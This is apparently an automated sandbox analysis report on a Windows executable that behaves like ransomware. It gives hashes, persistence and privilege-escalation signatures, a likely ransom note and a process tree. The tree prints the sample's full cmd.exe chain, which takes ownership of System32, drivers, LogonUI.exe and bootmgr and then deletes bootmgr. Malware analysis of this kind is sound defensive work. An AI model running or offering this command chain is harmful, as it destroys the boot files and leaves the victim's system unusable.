Analysis

  • max time kernel: 0s
  • max time network: 113s
  • platform: windows10-2004_x64
  • resource: win10v2004-20231215-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 29-12-2023 21:51

General

  • Target: 04df8dd30da8b5853f48cc1ac9b695a8.exe
  • Size: 6.1MB
  • MD5: 04df8dd30da8b5853f48cc1ac9b695a8
  • SHA1: 4c02262c2fea0e99277a99dcbe28a9c370b87c39
  • SHA256: 78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201
  • SHA512: 3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e
  • SSDEEP: 3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE

Signatures

  • Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt (7 IoCs)
  • Modifies file permissions (1 TTP, 7 IoCs)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  • Opens file in notepad (likely ransom note) (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe
    "C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious use of AdjustPrivilegeToken
    PID:2156
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
      2⤵
      PID:1336
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\drivers /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4064
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2680
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3900
      • C:\Windows\system32\takeown.exe
        takeown /f C:\bootmgr
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1084
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2492
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:984
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
      2⤵
      PID:1808
  • C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32 /grant Admin:F
    1⤵
    • Possible privilege escalation attempt
    • Modifies file permissions
    PID:3380
  • C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32
    1⤵
    • Possible privilege escalation attempt
    • Modifies file permissions
    PID:2488
  • C:\Windows\system32\rundll32.exe
    rundll32 user32.dll,UpdatePerUserSystemParameters
    1⤵
    PID:2232

        Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml
    Filesize: 11KB
    MD5: 49d826b5b43094f6fd04739c6b709ca0
    SHA1: a02d1ba89d7599472243279a5896139e86d754e3
    SHA256: e62f9094b7f46d4a59bf47a6f6099387cb73f71b9924487e73f188e26c7303d6
    SHA512: 8a60272466f674f12ad7b63775e6f51f367d2ec80d9efce8345dfe3a44465ef476dbb334f2e7b49da5f6c32befc2bde62f94090c78df9189253474ddce4ffeb5
  • C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat
    Filesize: 8KB
    MD5: ed890ebff57a837bcbee784b268a1d6d
    SHA1: f2bd0792ca7b275bee7c4ec0b51193e19227dfb3
    SHA256: 1dde681e2814fb5c1babe5cddf4903462db829ce4735ea18bef0345bc0016ced
    SHA512: 3ff5e65b3927bffdc8d940c0739a7628541d8d2a565d3daa941c1deed06b6b4a8e2fd0454d9ad96fcf48d390bdd1ffc835dba7cfea63e5838d17db03973d0b65
  • C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20231215_111740966.html
    Filesize: 37KB
    MD5: 354af3836d13dc27e65beb7fe917aaff
    SHA1: 2ca4375e7161228f5d54bd94fcd6bddb83a647c4
    SHA256: 788ecbbbf85c87889f3c2279922021247ffee188b7d89d92765c6f2104180397
    SHA512: b6a029ea67d731b0d565669109c0c230e20c423f873d983d5343bf1af296513cdc814a3b3726d407b1b14876b0d5448e1139ac25a92e5da46b596519a4193fc0
  • memory/2156-326-0x000000001B5A0000-0x000000001B749000-memory.dmp
    Filesize: 1.7MB
  • memory/2156-622-0x00007FFC51750000-0x00007FFC52211000-memory.dmp
    Filesize: 10.8MB
  • memory/2156-2-0x000000001B450000-0x000000001B460000-memory.dmp
    Filesize: 64KB
  • memory/2156-695-0x000000001B450000-0x000000001B460000-memory.dmp
    Filesize: 64KB
  • memory/2156-1-0x00007FFC51750000-0x00007FFC52211000-memory.dmp
    Filesize: 10.8MB
  • memory/2156-0-0x00000000002C0000-0x00000000008E0000-memory.dmp
    Filesize: 6.1MB
  • memory/2156-1138-0x000000001B450000-0x000000001B460000-memory.dmp
    Filesize: 64KB
  • memory/2156-1140-0x000000001B450000-0x000000001B460000-memory.dmp
    Filesize: 64KB
  • memory/2156-1143-0x000000001B450000-0x000000001B460000-memory.dmp
    Filesize: 64KB